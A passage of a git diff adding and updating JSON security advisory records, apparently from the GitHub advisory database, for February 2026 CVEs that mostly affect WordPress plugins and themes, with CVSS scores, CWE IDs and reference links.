authorization checks on the project and task comment submission functions (AJAX actions: wppm_submit_proj_comment and wppm_submit_task_comment). This makes it possible for authenticated attackers, with subscriber-level access and above, to create comments on any project or task (including private projects they cannot view or are not assigned to), and inject arbitrary HTML and CSS via the insufficiently sanitized comment_body parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1640" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/projects/open_project/wppm_submit_project_comment.php#L6" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/tasks/open_task/wppm_submit_task_comment.php#L6" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/66095908-875f-486d-ae77-6015671872de?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wxpc-f9fq-w9pq/GHSA-wxpc-f9fq-w9pq.json b/advisories/unreviewed/2026/02/GHSA-wxpc-f9fq-w9pq/GHSA-wxpc-f9fq-w9pq.json index 46321191a0f21..31fc90fce35ae 100644 --- a/advisories/unreviewed/2026/02/GHSA-wxpc-f9fq-w9pq/GHSA-wxpc-f9fq-w9pq.json +++ b/advisories/unreviewed/2026/02/GHSA-wxpc-f9fq-w9pq/GHSA-wxpc-f9fq-w9pq.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-610" + "CWE-610", + "CWE-611" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json index ceb4a2d258e16..4c28aa477e6c3 100644 --- a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json +++ b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json @@ -33,7 +33,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-285" + ], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-wxxw-44fp-jqf8/GHSA-wxxw-44fp-jqf8.json b/advisories/unreviewed/2026/02/GHSA-wxxw-44fp-jqf8/GHSA-wxxw-44fp-jqf8.json new file mode 100644 index 0000000000000..4f3ebca1f034e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wxxw-44fp-jqf8/GHSA-wxxw-44fp-jqf8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxxw-44fp-jqf8", + "modified": "2026-02-19T18:31:52Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25389" + ], + "details": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Metagauss EventPrime eventprime-event-calendar-management allows Retrieve Embedded Sensitive Data.This issue affects EventPrime: from n/a through <= 4.2.8.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25389" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/eventprime-event-calendar-management/vulnerability/wordpress-eventprime-plugin-4-2-8-3-sensitive-data-exposure-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-497" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x25m-mgjq-j9gg/GHSA-x25m-mgjq-j9gg.json b/advisories/unreviewed/2026/02/GHSA-x25m-mgjq-j9gg/GHSA-x25m-mgjq-j9gg.json new file mode 100644 index 0000000000000..c292791304e30 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x25m-mgjq-j9gg/GHSA-x25m-mgjq-j9gg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x25m-mgjq-j9gg", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68026" + ], + "details": "Missing Authorization vulnerability in Niaj Morshed LC Wizard ghl-wizard allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LC Wizard: from n/a through <= 2.1.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68026" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/ghl-wizard/vulnerability/wordpress-lc-wizard-plugin-2-1-0-settings-change-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x39p-mhp8-fvfx/GHSA-x39p-mhp8-fvfx.json b/advisories/unreviewed/2026/02/GHSA-x39p-mhp8-fvfx/GHSA-x39p-mhp8-fvfx.json new file mode 100644 index 0000000000000..9b0e16b73de44 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x39p-mhp8-fvfx/GHSA-x39p-mhp8-fvfx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x39p-mhp8-fvfx", + "modified": "2026-02-17T06:31:25Z", + "published": "2026-02-17T06:31:25Z", + "aliases": [ + "CVE-2026-2002" + ], + "details": "The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form_name parameter in all versions up to, and including, 1.50.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The plugin allows admins to give form management permissions to lower level users, which could make this exploitable by users such as subscribers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2002" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3458187%40forminator%2Ftrunk&old=3443402%40forminator%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4ada2055-3c4a-4b6f-8803-2eac8ede5ec7?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T05:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x3gw-vh56-pg6x/GHSA-x3gw-vh56-pg6x.json b/advisories/unreviewed/2026/02/GHSA-x3gw-vh56-pg6x/GHSA-x3gw-vh56-pg6x.json new file mode 100644 index 0000000000000..3fb3c0306470b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x3gw-vh56-pg6x/GHSA-x3gw-vh56-pg6x.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x3gw-vh56-pg6x", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2025-71246" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71246" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T16:27:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x44w-4824-m48x/GHSA-x44w-4824-m48x.json b/advisories/unreviewed/2026/02/GHSA-x44w-4824-m48x/GHSA-x44w-4824-m48x.json new file mode 100644 index 0000000000000..e89d5cb4951c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x44w-4824-m48x/GHSA-x44w-4824-m48x.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x44w-4824-m48x", + "modified": "2026-02-19T18:31:53Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-26359" + ], + "details": "Dell Unisphere for PowerMax, version(s) 10.2, contain(s) an External Control of File Name or Path vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to the ability to overwrite arbitrary files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26359" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000429268/dsa-2026-102-dell-unisphere-for-powermax-and-powermax-eem-security-update-for-multiple-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-73" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json b/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json new file mode 100644 index 0000000000000..e42c5f8bdd069 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x536-g6fc-g963", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-2464" + ], + "details": "Path traversal vulnerability in the AMR Printer Management 1.01 Beta web service, which allows remote attackers to read arbitrary files from the underlying Windows system by using specially crafted path traversal sequences in requests directed to the web management service. The service is accessible without authentication and runs with elevated privileges, amplifying the impact of the vulnerability. An attacker can exploit this condition to access sensitive and privileged files on the system using path traversal payloads. Successful exploitation of this vulnerability could lead to the unauthorized disclosure of internal system information, compromising the confidentiality of the affected environment.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2464" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/directory-traversal-amr-printer-management-amr" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json b/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json new file mode 100644 index 0000000000000..1ce1871d939ac --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x57h-c6qr-3m4q", + "modified": "2026-02-20T21:31:22Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22376" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Parkivia parkivia allows PHP Local File Inclusion.This issue affects Parkivia: from n/a through <= 1.1.9.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22376" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/parkivia/vulnerability/wordpress-parkivia-theme-1-1-9-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x5m6-cw78-7xrw/GHSA-x5m6-cw78-7xrw.json b/advisories/unreviewed/2026/02/GHSA-x5m6-cw78-7xrw/GHSA-x5m6-cw78-7xrw.json new file mode 100644 index 0000000000000..364da0e598a82 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x5m6-cw78-7xrw/GHSA-x5m6-cw78-7xrw.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x5m6-cw78-7xrw", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-13048" + ], + "details": "The StatCounter – Free Real Time Visitor Stats plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user's Nickname in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13048" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/official-statcounter-plugin-for-wordpress/tags/2.1.1/StatCounter-Wordpress-Plugin.php#L274" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3407998%40official-statcounter-plugin-for-wordpress&new=3407998%40official-statcounter-plugin-for-wordpress&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bcde42fb-6f61-4174-a44a-bb28e4855062?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x648-6h35-89x6/GHSA-x648-6h35-89x6.json b/advisories/unreviewed/2026/02/GHSA-x648-6h35-89x6/GHSA-x648-6h35-89x6.json new file mode 100644 index 0000000000000..5372b368f4151 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x648-6h35-89x6/GHSA-x648-6h35-89x6.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x648-6h35-89x6", + "modified": "2026-02-20T18:31:27Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-25005" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in N-Media Frontend File Manager nmedia-user-file-uploader allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Frontend File Manager: from n/a through <= 23.5.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25005" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/nmedia-user-file-uploader/vulnerability/wordpress-frontend-file-manager-plugin-23-5-insecure-direct-object-references-idor-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json b/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json new file mode 100644 index 0000000000000..63ac5f6018190 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x6m2-4qvv-ghf6", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69367" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes Oyster - Photography WordPress Theme oyster allows DOM-Based XSS.This issue affects Oyster - Photography WordPress Theme: from n/a through <= 4.4.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69367" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/oyster/vulnerability/wordpress-oyster-photography-wordpress-theme-theme-4-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x7fc-g3mg-7h5h/GHSA-x7fc-g3mg-7h5h.json b/advisories/unreviewed/2026/02/GHSA-x7fc-g3mg-7h5h/GHSA-x7fc-g3mg-7h5h.json new file mode 100644 index 0000000000000..dd8b316fefb88 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x7fc-g3mg-7h5h/GHSA-x7fc-g3mg-7h5h.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x7fc-g3mg-7h5h", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2024-43178" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43178" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260162" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x7xv-7m65-qgq2/GHSA-x7xv-7m65-qgq2.json b/advisories/unreviewed/2026/02/GHSA-x7xv-7m65-qgq2/GHSA-x7xv-7m65-qgq2.json new file mode 100644 index 0000000000000..958f06560385b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x7xv-7m65-qgq2/GHSA-x7xv-7m65-qgq2.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x7xv-7m65-qgq2", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-11754" + ], + "details": "The GDPR Cookie Consent plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'gdpr/v1/settings' REST API endpoint in all versions up to, and including, 4.1.2. This makes it possible for unauthenticated attackers to retrieve sensitive plugin settings including API tokens, email addresses, account IDs, and site keys.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11754" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/gdpr-cookie-consent/tags/4.0.1/includes/settings/class-gdpr-cookie-consent-api.php#L77" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3443083" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4107362f-ae21-4509-b83a-0bffbde23330?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x835-c867-m9pw/GHSA-x835-c867-m9pw.json b/advisories/unreviewed/2026/02/GHSA-x835-c867-m9pw/GHSA-x835-c867-m9pw.json new file mode 100644 index 0000000000000..5d63eb5fee125 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x835-c867-m9pw/GHSA-x835-c867-m9pw.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x835-c867-m9pw", + "modified": "2026-02-21T06:30:17Z", + "published": "2026-02-21T06:30:17Z", + "aliases": [ + "CVE-2026-2863" + ], + "details": "A flaw has been found in feng_ha_ha/megagao ssm-erp and production_ssm up to 4288d53bd35757b27f2d070057aefb2c07bdd097. The impacted element is the function deleteFile of the file FileServiceImpl.java. This manipulation causes path traversal. The attack can be initiated remotely. The exploit has been published and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. This product is distributed under two entirely different names. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2863" + }, + { + "type": "WEB", + "url": "https://github.com/megagao/production_ssm/issues/37" + }, + { + "type": "WEB", + "url": "https://github.com/megagao/production_ssm/issues/37#issue-3914979380" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347102" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347102" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754530" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T06:17:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xcg8-79j4-g746/GHSA-xcg8-79j4-g746.json b/advisories/unreviewed/2026/02/GHSA-xcg8-79j4-g746/GHSA-xcg8-79j4-g746.json new file mode 100644 index 0000000000000..34f8f8468f012 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xcg8-79j4-g746/GHSA-xcg8-79j4-g746.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcg8-79j4-g746", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69382" + ], + "details": "Deserialization of Untrusted Data vulnerability in themesflat Themesflat Elementor themesflat-elementor allows Object Injection.This issue affects Themesflat Elementor: from n/a through <= 1.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69382" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/themesflat-elementor/vulnerability/wordpress-themesflat-elementor-plugin-1-0-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xcv9-r62w-jh9r/GHSA-xcv9-r62w-jh9r.json b/advisories/unreviewed/2026/02/GHSA-xcv9-r62w-jh9r/GHSA-xcv9-r62w-jh9r.json new file mode 100644 index 0000000000000..6899349c2bf6c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xcv9-r62w-jh9r/GHSA-xcv9-r62w-jh9r.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcv9-r62w-jh9r", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22377" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Saveo saveo allows PHP Local File Inclusion.This issue affects Saveo: from n/a through <= 1.1.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22377" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/saveo/vulnerability/wordpress-saveo-theme-1-1-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xcxr-q3h4-4jc8/GHSA-xcxr-q3h4-4jc8.json b/advisories/unreviewed/2026/02/GHSA-xcxr-q3h4-4jc8/GHSA-xcxr-q3h4-4jc8.json new file mode 100644 index 0000000000000..7edd6180160b1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xcxr-q3h4-4jc8/GHSA-xcxr-q3h4-4jc8.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcxr-q3h4-4jc8", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2026-0556" + ], + "details": "The XO Event Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'xo_event_field' shortcode in all versions up to, and including, 3.2.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0556" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/xo-event-calendar/tags/3.2.10/inc/main.php?marks=1807-1816#L1807" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/xo-event-calendar/tags/3.2.10/inc/main.php?marks=1878-1882#L1878" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6bf0eef5-9276-4367-8451-017c509e443d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xf2h-44c3-m634/GHSA-xf2h-44c3-m634.json b/advisories/unreviewed/2026/02/GHSA-xf2h-44c3-m634/GHSA-xf2h-44c3-m634.json new file mode 100644 index 0000000000000..1e65ab6a3243d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xf2h-44c3-m634/GHSA-xf2h-44c3-m634.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xf2h-44c3-m634", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-12116" + ], + "details": "The Drift theme for WordPress is vulnerable to Stored Cross-Site Scripting via the post title in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12116" + }, + { + "type": "WEB", + "url": "https://themes.trac.wordpress.org/browser/drift/1.5.0/admin/main/options/00.theme-setup.php#L122" + }, + { + "type": "WEB", + "url": 